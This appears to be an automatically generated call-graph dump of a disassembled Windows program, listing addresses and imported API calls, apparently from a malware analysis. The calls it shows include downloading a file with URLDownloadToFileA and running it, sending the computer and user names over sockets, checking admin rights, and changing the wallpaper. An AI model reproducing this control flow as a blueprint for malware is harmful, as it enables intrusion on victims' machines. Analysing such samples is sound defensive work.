5782->5784 5785 409cf6 5783->5785 5786 409ce8 InvalidateRect 5783->5786 5787 409cd4 #4284 5784->5787 5788 409cc4 #4284 5784->5788 5786->5785 5787->5785 5788->5785 6215 409a20 6220 4099c0 6215->6220 6218 409a38 6219 409a2f #825 6219->6218 6221 409a03 6220->6221 6222 4099f3 #6170 6220->6222 6221->6218 6221->6219 6222->6221 6451 409b20 6452 409b31 6451->6452 6453 409b33 #6140 6451->6453 6452->6453 6196 401220 6197 4012c2 #2379 6196->6197 6198 401233 6196->6198 6199 401243 SendMessageA KillTimer #4853 6198->6199 6200 40126b SendMessageA 6198->6200 6199->6200 6201 401285 SendMessageA 6200->6201 6202 401297 6200->6202 6201->6202 6202->6197 6203 4012a1 SendMessageA 6202->6203 6203->6197 6204 4012b8 6203->6204 6204->6197 6205 405a20 6206 405a25 6205->6206 6209 4130bb 6206->6209 6212 41308f 6209->6212 6211 405a4a 6213 4130a4 __dllonexit 6212->6213 6214 413098 _onexit 6212->6214 6213->6211 6214->6211 6223 404620 #795 6224 404638 6223->6224 6225 40462f #825 6223->6225 6225->6224 5789 408c20 5794 408b40 5789->5794 5791 408c28 5792 408c38 5791->5792 5793 408c2f #825 5791->5793 5793->5792 5795 408bd0 5794->5795 5796 408b78 BitBlt 5794->5796 5798 408bd6 #2414 #640 5795->5798 5799 408bc1 #5785 5796->5799 5800 408bb5 #5785 5796->5800 5798->5791 5799->5798 5800->5798 5801 413427 5802 41342c 5801->5802 5805 4133fe #1168 5802->5805 5806 413421 5805->5806 5807 413418 _setmbcp 5805->5807 5807->5806 5811 407c30 OpenClipboard 5812 407c42 GlobalAlloc 5811->5812 5813 407ca9 5811->5813 5814 407c64 EmptyClipboard GlobalLock GlobalUnlock SetClipboardData CloseClipboard 5812->5814 5815 407c5b CloseClipboard 5812->5815 5814->5813 5808 40d830 inet_addr 5809 40d844 gethostbyname 5808->5809 5810 40d84f 5808->5810 5809->5810 5816 404430 5817 40447b 5816->5817 5818 40443d _TrackMouseEvent #2379 5816->5818 5821 404489 5817->5821 5823 404530 5817->5823 5822 4044a1 SetCursor #2379 5821->5822 5824 4045c1 5823->5824 5825 404552 5823->5825 5824->5821 5825->5824 5826 404559 #289 #5789 GetTextExtentPoint32A #5789 #613 5825->5826 5826->5824 6046 406930 #6215 6047 402d30 6048 402d73 #825 6047->6048 6049 402d3f 6047->6049 6050 402d40 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N #825 6049->6050 6050->6050 6051 402d72 6050->6051 6051->6048 6226 405230 6233 405369 6226->6233 6236 40525a 6226->6236 6227 405552 InvalidateRect 6232 405560 6227->6232 6228 405285 6229 4052ee 7 API calls 6228->6229 6230 40528f #4277 #923 #858 #800 #800 6228->6230 6229->6227 6230->6227 6231 40539e 6234 405430 6231->6234 6235 4053aa 7 API calls 6231->6235 6233->6227 6233->6231 6240 405390 #940 6233->6240 6237 4054b4 6234->6237 6238 405435 7 API calls 6234->6238 6235->6227 6236->6228 6239 405277 #940 6236->6239 6241 4054b8 6237->6241 6243 405503 6237->6243 6238->6227 6239->6228 6239->6239 6240->6231 6240->6240 6241->6227 6242 4054de #6778 #6648 6241->6242 6242->6242 6244 405501 6242->6244 6243->6227 6243->6232 6245 405529 #6778 #6648 6243->6245 6244->6227 6245->6227 6245->6245 6246 40d630 6251 40d650 6246->6251 6248 40d638 6249 40d648 6248->6249 6250 40d63f #825 6248->6250 6250->6249 6252 40dad0 4 API calls 6251->6252 6253 40d680 6252->6253 6253->6248 6052 402531 6053 402543 6052->6053 6054 40253c CloseHandle 6052->6054 6055 402555 6053->6055 6056 40254e CloseHandle 6053->6056 6054->6053 6056->6055 6254 40ca3a 6257 40ca40 6254->6257 6255 40ca81 6256 40ca87 #825 6256->6255 6257->6255 6257->6256 5827 4068c0 #4837 6258 4032c0 6 API calls 6259 403334 SendMessageA #3092 6258->6259 6261 40335c SendMessageA #3092 6259->6261 6263 40337b SendMessageA #3092 6261->6263 6265 4033a0 SendMessageA 6263->6265 6266 40339d 6263->6266 6269 403cb0 FindFirstFileA 6265->6269 6266->6265 6268 4033b2 SendMessageA #3996 SendMessageA 6270 403cd9 6269->6270 6271 403ce3 6269->6271 6270->6268 6272 403e1f FindNextFileA 6271->6272 6274 403d14 sscanf 6271->6274 6272->6271 6273 403e3a FindClose 6272->6273 6273->6268 6274->6272 6275 403d38 fopen 6274->6275 6275->6272 6276 403d5c fread 6275->6276 6277 403e15 fclose 6276->6277 6281 403d7b 6276->6281 6277->6272 6278 403d8f sprintf 6279 403dd4 SendMessageA #823 SendMessageA 6278->6279 6279->6277 6281->6277 6281->6278 6281->6279 6282 401c30 inet_ntoa 6281->6282 6282->6281 6454 4043c0 #6453 #2414 6455 409fc0 TextOutA 4772 4064d0 #4710 SendMessageA SendMessageA 4816 401c70 wcscat 4772->4816 4774 406516 4775 406577 4774->4775 4776 40651d GetModuleFileNameA strrchr 4774->4776 4825 401a10 4775->4825 4777 40656c SetCurrentDirectoryA 4776->4777 4778 40655d strrchr 4776->4778 4777->4775 4778->4777 4780 406585 4781 4065e5 4780->4781 4782 40658c time 4780->4782 4835 402c40 4781->4835 4783 401a10 5 API calls 4782->4783 4783->4781 4785 4065ed __p___argc 4786 406606 4785->4786 4787 40678c 4786->4787 4788 40660f __p___argv 4786->4788 4883 407e80 SHGetFolderPathW wcslen 4787->4883 4790 406621 4788->4790 4793 406661 __p___argv 4790->4793 4794 406652 4790->4794 4791 406793 SetWindowTextW 4886 406f80 4791->4886 4797 40666d 4793->4797 4859 407f80 fopen 4794->4859 4795 4067a9 4944 406c20 GetUserDefaultLangID GetLocaleInfoA 4795->4944 4801 4066ad __p___argv 4797->4801 4802 40669e 4797->4802 4800 4067b0 SetTimer SetTimer 4804 4066b9 4801->4804 4841 4080c0 FindFirstFileA 4802->4841 4804->4787 4807 4066ee Sleep 4804->4807 4869 401bb0 AllocateAndInitializeSid 4807->4869 4809 406734 4810 406750 sprintf 4809->4810 4811 406738 4809->4811 4875 401a90 CreateProcessA 4810->4875 4874 401b50 ShellExecuteExA 4811->4874 4814 40674b ExitProcess 4817 401cdc 4816->4817 4818 401d00 RegCreateKeyW 4817->4818 4819 401d62 RegQueryValueExA 4817->4819 4820 401d1d GetCurrentDirectoryA RegSetValueExA 4817->4820 4821 401dbb 4817->4821 4818->4817 4822 401d9e RegCloseKey 4819->4822 4823 401d90 SetCurrentDirectoryA 4819->4823 4820->4822 4821->4774 4822->4817 4824 401dc8 4822->4824 4823->4822 4824->4774 4826 401a1a fopen 4825->4826 4828 401a3a 4826->4828 4829 401a6f 4826->4829 4830 401a53 fwrite 4828->4830 4831 401a46 fread 4828->4831 4829->4780 4832 401a5e 4830->4832 4831->4832 4833 401a74 fclose 4832->4833 4834 401a66 fclose 4832->4834 4833->4780 4834->4829 4953 404b70 4835->4953 4837 402c46 4838 402c57 4837->4838 4839 402c5e LoadLibraryA 4837->4839 4838->4785 4839->4838 4840 402c73 7 API calls 4839->4840 4840->4838 4842 40820a 4841->4842 4854 408124 4841->4854 4958 401e30 4842->4958 4845 4081e4 FindNextFileA 4846 4081ff FindClose 4845->4846 4845->4854 4846->4842 4847 401e30 2 API calls 4849 408255 sprintf #537 4847->4849 4848 408158 sscanf 4848->4845 4850 408178 fopen 4848->4850 4963 4082c0 4849->4963 4850->4845 4852 408190 fread 4850->4852 4852->4854 4855 4081bd fclose 4852->4855 4854->4845 4854->4848 4854->4855 4855->4845 4855->4854 4856 408291 #537 4858 4082c0 141 API calls 4856->4858 4857 4066a5 ExitProcess 4858->4857 4860 407fd0 fread fclose 4859->4860 4868 406659 ExitProcess 4859->4868 5333 40be90 strncpy strncpy strncpy 4860->5333 4862 408002 5334 40c4f0 4862->5334 4864 40801d 4865 40c4f0 112 API calls 4864->4865 4866 408041 4864->4866 4865->4866 4867 401a10 5 API calls 4866->4867 4866->4868 4867->4868 4870 401bf6 4869->4870 4871 401bfb CheckTokenMembership 4869->4871 4870->4809 4872 401c10 4871->4872 4873 401c14 FreeSid 4871->4873 4872->4873 4873->4809 4874->4814 4876 401b45 4875->4876 4877 401aed 4875->4877 4876->4814 4878 401af5 WaitForSingleObject 4877->4878 4879 401b26 CloseHandle CloseHandle 4877->4879 4880 401b12 4878->4880 4881 401b05 TerminateProcess 4878->4881 4879->4814 4880->4879 4882 401b1a GetExitCodeProcess 4880->4882 4881->4880 4882->4879 4884 407f02 4883->4884 4885 407f09 swprintf MultiByteToWideChar CopyFileW SystemParametersInfoW 4883->4885 4884->4791 4885->4791 5348 4076a0 4886->5348 4888 406fa8 27 API calls 4889 407119 4888->4889 4890 40711c SendMessageA #3092 4888->4890 4889->4890 4891 40713d SendMessageA #3092 4890->4891 4893 40715f SendMessageA #3092 4891->4893 4895 407181 SendMessageA #3092 4893->4895 4897 4071a3 SendMessageA #3092 4895->4897 4899 4071c5 SendMessageA #3092 4897->4899 4901 4071e7 4899->4901 4902 4071ea SendMessageA #3092 4899->4902 4901->4902 4903 407205 SendMessageA #3092 4902->4903 4905 407227 SendMessageA #3092 4903->4905 4907 407249 SendMessageA #3092 4905->4907 4909 40726b 4907->4909 4910 40726e SendMessageA #860 4907->4910 4909->4910 4911 4072a4 4910->4911 4912 4072ed #537 4911->4912 5364 404210 #858 #800 4912->5364 4914 407309 #537 5365 404210 #858 #800 4914->5365 4916 407325 #540 #2818 #535 5366 404210 #858 #800 4916->5366 4918 407369 5367 404270 4918->5367 4922 4073a8 SendMessageA SendMessageA #6140 #6140 4923 407428 4922->4923 5371 405920 4923->5371 4927 407457 5379 4058c0 4927->5379 4929 407460 5382 405180 _mbscmp 4929->5382 4931 407477 4932 405920 2 API calls 4931->4932 4933 4074ac 4932->4933 4934 405860 2 API calls 4933->4934 4935 4074b5 4934->4935 4936 4058c0 2 API calls 4935->4936 4937 4074be 4936->4937 4938 405180 4 API calls 4937->4938 4939 4074d5 GetTimeZoneInformation 4938->4939 5388 401e60 VariantTimeToSystemTime 4939->5388 4941 407508 SystemTimeToTzSpecificLocalTime #2818 5389 401e60 VariantTimeToSystemTime 4941->5389 4943 40759b SystemTimeToTzSpecificLocalTime #2818 #6334 #800 4943->4795 4945 406c81 SendMessageA 4944->4945 4946 406c5d 4944->4946 4947 406cc1 SendMessageA 4945->4947 4948 406ca1 SendMessageA 4945->4948 4946->4945 4950 406ae0 27 API calls 4947->4950 5396 406ae0 8 API calls 4948->5396 4951 406cdd 4950->4951 4951->4800 4952 406cba 4952->4800 4954 404b81 LoadLibraryA 4953->4954 4955 404b7a 4953->4955 4956 404b96 6 API calls 4954->4956 4957 404bf6 4954->4957 4955->4837 4956->4957 4957->4837 4990 401e60 VariantTimeToSystemTime 4958->4990 4960 401e42 4991 401de0 sprintf 4960->4991 4962 401e51 4962->4847 4964 408337 4963->4964 4965 4082fb #4278 #858 #800 4963->4965 4966 408344 4964->4966 4967 408378 time 4964->4967 4965->4964 4968 408359 #800 4966->4968 4969 40834d #1200 4966->4969 4970 40839c 4967->4970 4971 40844d time 4967->4971 4972 40828c 4968->4972 4969->4968 4970->4971 4973 4083a9 4970->4973 4971->4973 4974 408466 4971->4974 4972->4856 4972->4857 4975 4083bb 4973->4975 4976 40846c fopen 4973->4976 4974->4976 4977 4083c4 #540 time #2818 #1200 #800 4975->4977 4978 40842e #800 4975->4978 4979 4084b5 fread fclose 4976->4979 4980 408496 #800 4976->4980 4977->4978 4978->4972 4992 40be90 strncpy strncpy strncpy 4979->4992 4980->4972 4982 4084e7 4993 40c060 4982->4993 4984 408501 4985 408516 4984->4985 4986 408538 4984->4986 4987 408549 #800 4985->4987 4988 40851a #1200 time 4985->4988 4986->4987 4989 40853c #1200 4986->4989 4987->4972 4988->4987 4989->4987 4990->4960 4991->4962 4992->4982 4994 40c07f 4993->4994 5020 40bed0 4994->5020 4996 40c0ba 4997 40c0c1 4996->4997 4998 40c0e7 4996->4998 4999 40c0cc SendMessageA 4997->4999 5002 40c0db 4997->5002 5000 40c104 4998->5000 5001 40c0f8 SendMessageA 4998->5001 4999->5002 5039 40dd00 5000->5039 5001->5000 5004 40dbf0 free 5002->5004 5005 40c173 5004->5005 5005->4984 5006 40c116 5007 40c144 5006->5007 5008 40c17b 5006->5008 5009 40c154 5007->5009 5010 40c148 SendMessageA 5007->5010 5011 40c18b 5008->5011 5012 40c17f SendMessageA 5008->5012 5042 40dbf0 5009->5042 5010->5009 5014 40c1b4 5011->5014 5015 40c1e8 5011->5015 5012->5011 5016 40c1c4 5014->5016 5017 40c1b8 SendMessageA 5014->5017 5015->5002 5018 40c1f5 SendMessageA 5015->5018 5019 40dbf0 free 5016->5019 5017->5016 5018->5002 5019->5005 5021 40bef5 5020->5021 5022 40bf0a #823 5020->5022 5021->5022 5023 40bf2e 5022->5023 5024 40bf27 5022->5024 5026 40bf46 5023->5026 5050 40baf0 5023->5050 5046 40d5e0 5024->5046 5026->4996 5029 40bf72 5029->4996 5030 40bf8a GetComputerNameA GetUserNameA 5082 40dc00 5030->5082 5033 40dd00 4 API calls 5034 40c01f 5033->5034 5035 40dc00 4 API calls 5034->5035 5036 40c038 5035->5036 5037 40dd00 4 API calls 5036->5037 5038 40c047 5037->5038 5038->4996 5040 40dc00 4 API calls 5039->5040 5041 40dd1c 5040->5041 5041->5006 5043 40dd70 5042->5043 5044 40dd8b 5043->5044 5329 412ac0 5043->5329 5044->5005 5047 40d602 5046->5047 5091 40dad0 5047->5091 5094 40ba10 5050->5094 5052 40bdf5 5052->5029 5052->5030 5053 40bb14 5053->5052 5054 40bb42 5053->5054 5099 40ba60 5053->5099 5054->5052 5103 40c8f0 #823 5054->5103 5058 40bc1b strtok 5060 40bc30 5058->5060 5074 40bbb7 5058->5074 5059 40ba60 closesocket 5062 40bc8b 5059->5062 5060->5059 5064 40bcec GetTickCount srand 5060->5064 5063 40bc92 5062->5063 5062->5064 5125 40c860 5063->5125 5066 40bdc7 5064->5066 5067 40bd07 rand 5064->5067 5070 40c860 2 API calls 5066->5070 5071 40bd1e 5067->5071 5069 40bcd8 #825 5069->5052 5073 40bde8 #825 5070->5073 5076 40ba60 closesocket 5071->5076 5079 40be11 5071->5079 5131 40ce50 5071->5131 5073->5052 5074->5058 5075 40c7b0 #825 5074->5075 5105 40c7b0 5074->5105 5109 40c920 5074->5109 5121 40c800 #823 5074->5121 5075->5058 5076->5071 5077 40be75 #825 5077->5052 5079->5077 5137 40c740 5079->5137 5083 40dc15 5082->5083 5089 40c013 5082->5089 5084 40dc77 5083->5084 5085 40dc49 5083->5085 5083->5089 5328 412aa0 realloc 5084->5328 5327 412a90 malloc 5085->5327 5088 40dc51 5088->5089 5090 40dc8d ??0exception@@QAE@ABQBD _CxxThrowException 5088->5090 5089->5033 5090->5089 5092 40d61e 5091->5092 5093 40dadf setsockopt send shutdown closesocket 5091->5093 5092->5023 5093->5092 5095 40ba27 5094->5095 5096 40ba2b 5095->5096 5142 40b840 sprintf GetFileAttributesA 5095->5142 5096->5053 5098 40ba31 5098->5053 5100 40ba88 5099->5100 5263 40d8c0 5100->5263 5104 40bb62 strtok 5103->5104 5104->5060 5104->5074 5106 40c7d0 5105->5106 5107 40c7bb 5105->5107 5106->5074 5107->5106 5108 40c7d6 #825 5107->5108 5108->5106 5110 40c932 5109->5110 5111 40c92d ?_Xlen@std@ 5109->5111 5112 40c973 5110->5112 5113 40c963 5110->5113 5114 40c946 5110->5114 5111->5110 5117 40c990 5112->5117 5118 40c7b0 #825 5112->5118 5115 40c7b0 #825 5113->5115 5119 40c94a 5114->5119 5267 40c9c0 5114->5267 5116 40c96c 5115->5116 5116->5074 5117->5074 5118->5114 5119->5074 5122 40c81f 5121->5122 5273 40cad0 5122->5273 5124 40c844 5124->5074 5126 40c870 5125->5126 5127 40c8d9 5125->5127 5128 40c8ab #825 5126->5128 5129 40c8a2 #825 5126->5129 5127->5069 5128->5126 5130 40c8cc 5128->5130 5129->5128 5130->5069 5132 40ce68 5131->5132 5133 40ce5a 5131->5133 5135 40ce94 #825 5132->5135 5136 40bd9e #825 Sleep 5132->5136 5133->5132 5134 40ce6e #825 5133->5134 5134->5132 5135->5136 5136->5066 5136->5067 5138 40c761 5137->5138 5139 40c77e #825 5137->5139 5140 40c775 #825 5138->5140 5141 40c76f 5138->5141 5139->5079 5140->5139 5141->5139 5143 40b898 5142->5143 5144 40b95b CreateProcessA 5142->5144 5160 40b6a0 CreateDirectoryA 5143->5160 5146 40b9b4 5144->5146 5147 40b9bf WaitForSingleObject 5144->5147 5146->5098 5148 40b9e4 CloseHandle CloseHandle 5147->5148 5149 40b9d8 WaitForSingleObject 5147->5149 5148->5098 5149->5148 5150 40b8a9 5151 40b8b0 5150->5151 5152 40b8e9 sprintf GetFileAttributesA 5150->5152 5174 40b780 CreateDirectoryA 5151->5174 5154 40b946 CopyFileA 5152->5154 5155 40b93b 5152->5155 5154->5144 5155->5098 5156 40b8c1 5156->5152 5157 40b780 60 API calls 5156->5157 5158 40b8d9 5157->5158 5158->5152 5159 40b8e0 5158->5159 5159->5098 5182 412920 5160->5182 5163 40b6d8 DeleteFileA 5163->5150 5164 40b6ec 5185 412940 5164->5185 5166 40b719 5166->5150 5167 40b76a 5194 412a00 5167->5194 5168 412940 14 API calls 5170 40b738 sprintf 5168->5170 5191 4129e0 5170->5191 5171 40b770 5171->5150 5173 40b70e 5173->5166 5173->5167 5173->5168 5175 40b81b 5174->5175 5176 40b7ae GetTempFileNameA DeleteUrlCacheEntry URLDownloadToFileA 5174->5176 5175->5156 5177 40b810 DeleteFileA 5176->5177 5178 40b7f6 5176->5178 5177->5175 5179 40b6a0 54 API calls 5178->5179 5180 40b809 5179->5180 5180->5177 5181 40b827 DeleteFileA 5180->5181 5181->5156 5205 4127e0 #823 5182->5205 5184 40b6cf 5184->5163 5184->5164 5186 412964 5185->5186 5187 412959 5185->5187 5188 412969 5186->5188 5218 411cf0 5186->5218 5187->5173 5188->5173 5190 412982 5190->5173 5251 412990 5191->5251 5193 4129f8 5193->5173 5195 412a15 5194->5195 5196 412a09 5194->5196 5197 412a1a 5195->5197 5257 4127a0 5195->5257 5196->5171 5197->5171 5200 412a7d #825 5200->5171 5201 412a44 #825 5202 412a4d 5201->5202 5203 412a61 #825 5202->5203 5204 412a6a #825 5202->5204 5203->5204 5204->5200 5206 412815 5205->5206 5207 41287a 5205->5207 5206->5207 5208 41283d #823 5206->5208 5209 411c00 15 API calls 5207->5209 5208->5207 5210 41289d 5209->5210 5211 4128a6 5210->5211 5212 4128f8 #823 5210->5212 5213 4128e5 5211->5213 5214 4128b4 #825 5211->5214 5215 4128bd 5211->5215 5212->5184 5213->5184 5214->5215 5216 4128d6 #825 5215->5216 5217 4128cd #825 5215->5217 5216->5213 5217->5216 5219 412231 5218->5219 5220 411d11 5218->5220 5219->5190 5220->5219 5221 411ac0 free free 5220->5221 5224 411d27 5220->5224 5221->5224 5222 411d37 5222->5190 5223 411dc2 5225 411ddc 5223->5225 5227 4113e0 SetFilePointer SetFilePointer ReadFile 5223->5227 5224->5222 5224->5223 5226 411390 SetFilePointer SetFilePointer ReadFile 5224->5226 5228 411350 SetFilePointer SetFilePointer ReadFile 5225->5228 5226->5223 5227->5223 5229 411dfe 5228->5229 5230 411460 SetFilePointer SetFilePointer ReadFile 5229->5230 5231 411e15 5230->5231 5232 411e1c 5231->5232 5233 410a50 SetFilePointer SetFilePointer 5231->5233 5232->5190 5234 411e3e 5233->5234 5235 411e45 5234->5235 5236 411e56 #823 5234->5236 5235->5190 5237 410af0 ReadFile 5236->5237 5238 411e78 5237->5238 5239 411e83 #825 5238->5239 5240 411e9d _mbsstr 5238->5240 5239->5190 5242 411f15 _mbsstr 5240->5242 5242->5240 5243 411f2c _mbsstr 5242->5243 5243->5240 5244 411f43 _mbsstr 5243->5244 5244->5240 5245 411f5a 5244->5245 5246 411b80 SystemTimeToFileTime 5245->5246 5247 412063 LocalFileTimeToFileTime 5246->5247 5250 4120b6 5247->5250 5248 412203 5248->5190 5249 4121fa #825 5249->5248 5250->5248 5250->5249 5252 4129a3 5251->5252 5253 412998 5251->5253 5254 4129a8 5252->5254 5255 412360 28 API calls 5252->5255 5253->5193 5254->5193 5256 4129cf 5255->5256 5256->5193 5258 4127b1 5257->5258 5259 4127a9 5257->5259 5261 4127c7 5258->5261 5262 410f70 FindCloseChangeNotification #825 free free free 5258->5262 5260 411ac0 free free 5259->5260 5260->5258 5261->5200 5261->5201 5261->5202 5262->5261 5265 40d8ec 5263->5265 5264 40daad closesocket 5266 40baa8 5264->5266 5265->5264 5265->5266 5266->5054 5268 40c9f6 #823 5267->5268 5272 40ca40 5268->5272 5270 40ca81 5270->5117 5271 40ca87 #825 5271->5270 5272->5270 5272->5271 5274 40cbf3 5273->5274 5275 40cb00 5273->5275 5274->5124 5276 40cb26 5275->5276 5282 40cb90 5275->5282 5277 40cb31 5276->5277 5278 40cb2c ?_Xran@std@ 5276->5278 5292 40cd80 5277->5292 5278->5277 5279 40cbe9 5281 40cc60 5 API calls 5279->5281 5281->5274 5282->5279 5284 40cbaa 5282->5284 5283 40cb38 5286 40cb6a 5283->5286 5287 40cb47 memmove 5283->5287 5285 40c7b0 #825 5284->5285 5288 40cbb3 5285->5288 5290 40cd80 4 API calls 5286->5290 5309 40cc60 5287->5309 5288->5124 5291 40cb7d 5290->5291 5291->5124 5293 40cd93 5292->5293 5294 40ce27 5292->5294 5293->5294 5295 40cdd0 5293->5295 5296 40cdc9 ?_Xlen@std@ 5293->5296 5294->5283 5297 40cdf8 5295->5297 5300 40cde2 5295->5300 5296->5295 5298 40ce0a 5297->5298 5299 40cdfc 5297->5299 5298->5294 5305 40c7b0 #825 5298->5305 5301 40c7b0 #825 5299->5301 5302 40cde6 5300->5302 5303 40ce1f 5300->5303 5304 40ce05 5301->5304 5306 40c7b0 #825 5302->5306 5307 40c9c0 2 API calls 5303->5307 5304->5283 5305->5303 5308 40cdf3 5306->5308 5307->5294 5308->5283 5310 40cc73 5309->5310 5311 40cc6e ?_Xlen@std@ 5309->5311 5312 40cd04 5310->5312 5313 40cc88 5310->5313 5314 40ccae 5310->5314 5311->5310 5312->5313 5319 40cd08 5312->5319 5315 40cc90 5313->5315 5318 40c9c0 2 API calls 5313->5318 5317 40ccd9 #825 5314->5317 5321 40ccc4 5314->5321 5315->5286 5316 40cd4c 5322 40c9c0 2 API calls 5316->5322 5317->5321 5318->5315 5319->5315 5319->5316 5320 40cd43 #825 5319->5320 5323 40cd26 5319->5323 5320->5316 5321->5286 5324 40cd5d 5322->5324 5325 40c9c0 2 API calls 5323->5325 5324->5286 5326 40cd3b 5325->5326 5326->5286 5327->5088 5328->5088 5330 412af5 5329->5330 5331 412ac8 free 5329->5331 5330->5044 5331->5330 5333->4862 5335 40c50f 5334->5335 5336 40bed0 110 API calls 5335->5336 5337 40c54b 5336->5337 5338 40c596 5337->5338 5339 40dd00 4 API calls 5337->5339 5340 40dbf0 free 5338->5340 5342 40c568 5339->5342 5341 40c5e7 5340->5341 5341->4864 5342->5338 5343 40c600 5342->5343 5344 40c635 5343->5344 5345 40c617 strncpy 5343->5345 5346 40dbf0 free 5344->5346 5345->5344 5347 40c650 5346->5347 5347->4864 5349 4076d9 time 5348->5349 5351 4076d7 5349->5351 5350 407771 sprintf 5350->5351 5351->5349 5351->5350 5352 405180 4 API calls 5351->5352 5353 407842 SendMessageA SendMessageA #540 5351->5353 5352->5351 5354 407894 5353->5354 5355 4078aa _ftol #2818 #2818 5354->5355 5356 4078db #2818 #2818 5354->5356 5357 407911 #3092 #6199 5355->5357 5356->5357 5358 407990 #800 5357->5358 5359 407940 5357->5359 5358->4888 5359->5358 5360 407952 InvalidateRect 5359->5360 5361 405920 2 API calls 5360->5361 5362 407978 5361->5362 5363 405920 2 API calls 5362->5363 5363->5358 5364->4914 5365->4916 5366->4918 5390 4044c0 5367->5390 5370 404210 #858 #800 5370->4922 5394 405950 InvalidateRect 5371->5394 5373 40592d 5395 405970 InvalidateRect 5373->5395 5375 40593e 5376 405860 5375->5376 5377 405872 5376->5377 5378 405875 GetClientRect #6197 5376->5378 5377->5378 5378->4927 5380 4058d2 5379->5380 5381 4058d5 GetClientRect #6197 5379->5381 5380->5381 5381->4929 5383 4051f8 5382->5383 5384 40519e #860 5382->5384 5383->4931 5385 4051b1 5384->5385 5386 4051d1 RedrawWindow 5385->5386 5387 4051ea InvalidateRect 5385->5387 5386->4931 5387->5383 5388->4941 5389->4943 5391 4044f8 GetObjectA CreateFontIndirectA #1641 5390->5391 5392 4044ce GetParent #2864 SendMessageA #2860 5390->5392 5393 40427a #2818 #535 5391->5393 5392->5391 5392->5393 5393->5370 5394->5373 5395->5375 5397 406b88 #537 #924 sprintf #800 #800 5396->5397 5398 406bda 5396->5398 5397->5398 5401 406cf0 5398->5401 5400 406be6 #800 5400->4952 5402 406d16 5401->5402 5403 406d19 SendMessageA #353 SendMessageA #1979 5401->5403 5402->5403 5406 406dc0 SendMessageA #823 5403->5406 5407 406e00 SendMessageA 5406->5407 5408 406d7b #665 5406->5408 5410 406ed2 #825 5407->5410 5411 406e2f _strnicmp 5407->5411 5408->5400 5410->5408 5412 406e4b _strnicmp 5411->5412 5413 406e67 5411->5413 5412->5413 5413->5410 5413->5411 5414 406e87 SendMessageA #6136 5413->5414 5414->5413 6058 4059d0 #561 5415 40dad0 5416 40db33 5415->5416 5417 40dadf setsockopt send shutdown closesocket 5415->5417 5417->5416 6456 40dbd0 6457 40dbf0 free 6456->6457 6458 40dbd8 6457->6458 6459 40dbe8 6458->6459 6460 40dbdf #825 6458->6460 6460->6459 5418 40bed0 5419 40bef5 5418->5419 5420 40bf0a #823 5418->5420 5419->5420 5421 40bf2e 5420->5421 5422 40bf27 5420->5422 5424 40bf46 5421->5424 5425 40baf0 99 API calls 5421->5425 5423 40d5e0 4 API calls 5422->5423 5423->5421 5426 40bf6b 5425->5426 5427 40bf72 5426->5427 5428 40bf8a GetComputerNameA GetUserNameA 5426->5428 5429 40dc00 4 API calls 5428->5429 5430 40c013 5429->5430 5431 40dd00 4 API calls 5430->5431 5432 40c01f 5431->5432 5433 40dc00 4 API calls 5432->5433 5434 40c038 5433->5434 5435 40dd00 4 API calls 5434->5435 5436 40c047 5435->5436 5828 404cd0 5833 404cf0 #2414 #2414 #800 #641 5828->5833 5830 404cd8 5831 404ce8 5830->5831 5832 404cdf #825 5830->5832 5832->5831 5833->5830 6057 4019d0 EnableWindow 6059 404dd0 6 API calls 6060 404e3b SendMessageA #3092 6059->6060 6062 404e60 SendMessageA #3092 6060->6062 6064 404e93 SendMessageA 6062->6064 6065 404e7f SendMessageA 6062->6065 5447 4102d0 free 5834 4130d4 ??1type_info@@UAE 5835 4130e3 #825 5834->5835 5836 4130ea 5834->5836 5835->5836 6283 4086e0 #470 GetClientRect SendMessageA #6734 #323 6284 408765 6283->6284 6285 408838 6284->6285 6288 4087bd CreateCompatibleDC #1640 6284->6288 6286 408885 #2754 6285->6286 6287 408869 FillRect 6285->6287 6289 408897 #2381 6286->6289 6287->6289 6315 409e70 CreateCompatibleBitmap #1641 6288->6315 6292 4088b4 6289->6292 6293 408a7d 6289->6293 6292->6293 6295 4088be #3797 6292->6295 6297 409f80 BitBlt 6293->6297 6311 408a5e 6293->6311 6294 408809 6316 409f10 6294->6316 6298 408901 _ftol 6295->6298 6300 408abe 6297->6300 6305 40895e _ftol 6298->6305 6307 40897e 6298->6307 6299 408817 #6194 6299->6285 6302 408ad5 #5785 6300->6302 6303 408ac6 #5785 6300->6303 6302->6311 6303->6311 6305->6307 6306 408afe #640 #755 6308 4089a7 FillRect 6307->6308 6309 4089b8 FillRect 6307->6309 6310 4089ca 6307->6310 6308->6310 6309->6310 6310->6311 6319 409f80 6310->6319 6322 409e20 #2414 6311->6322 6313 408a50 6314 409f10 2 API calls 6313->6314 6314->6311 6315->6294 6317 409f25 #5785 6316->6317 6318 409f18 #5785 6316->6318 6317->6299 6318->6299 6320 409f88 6319->6320 6321 409f8b BitBlt 6319->6321 6320->6321 6321->6313 6322->6306 6323 40c6e0 6324 40c722 #825 6323->6324 6325 40c6ef 6323->6325 6326 40c7b0 #825 6325->6326 6327 40c70d #825 6326->6327 6327->6325 6328 40c721 6327->6328 6328->6324 6474 40cfe0 6481 40d4c0 6474->6481 6476 40cffb 6477 40d4c0 4 API calls 6476->6477 6480 40d05e 6476->6480 6478 40d031 6477->6478 6479 40d4c0 4 API calls 6478->6479 6478->6480 6479->6480 6482 40d4d0 6481->6482 6483 40d4d9 6481->6483 6482->6476 6484 40d4e4 6483->6484 6485 40d4ee time 6483->6485 6484->6476 6486 40d575 6485->6486 6489 40d50a 6485->6489 6487 40d58a 6486->6487 6488 40d2b0 memmove 6486->6488 6487->6476 6488->6487 6489->6486 6490 40d569 time 6489->6490 6491 40d551 Sleep 6489->6491 6490->6486 6490->6489 6491->6489 4755 4043e0 #4284 #3874 #5277 5837 40a0e0 Escape 5838 4068e0 5839 4068ef 5838->5839 5840 40691a #5280 5839->5840 5841 4068fc 5839->5841 6465 404fe0 #6334 6466 404ff4 #4853 6465->6466 6467 404ffb 6465->6467 6466->6467 6078 405df0 6083 405d90 #654 #765 6078->6083 6080 405df8 6081 405e08 6080->6081 6082 405dff #825 6080->6082 6082->6081 6083->6080 5842 4090f0 5843 409124 #540 #3874 5842->5843 5844 40971e 5842->5844 5845 409185 5843->5845 5846 40915e 5843->5846 5848 40919c _ftol 5845->5848 5849 40918e #860 5845->5849 5847 40917c 5846->5847 5850 40916e #860 5846->5850 5851 4091d5 SendMessageA #2860 5847->5851 5852 40970a #800 5847->5852 5848->5847 5849->5848 5850->5847 5853 409208 5851->5853 5852->5844 5868 409870 5853->5868 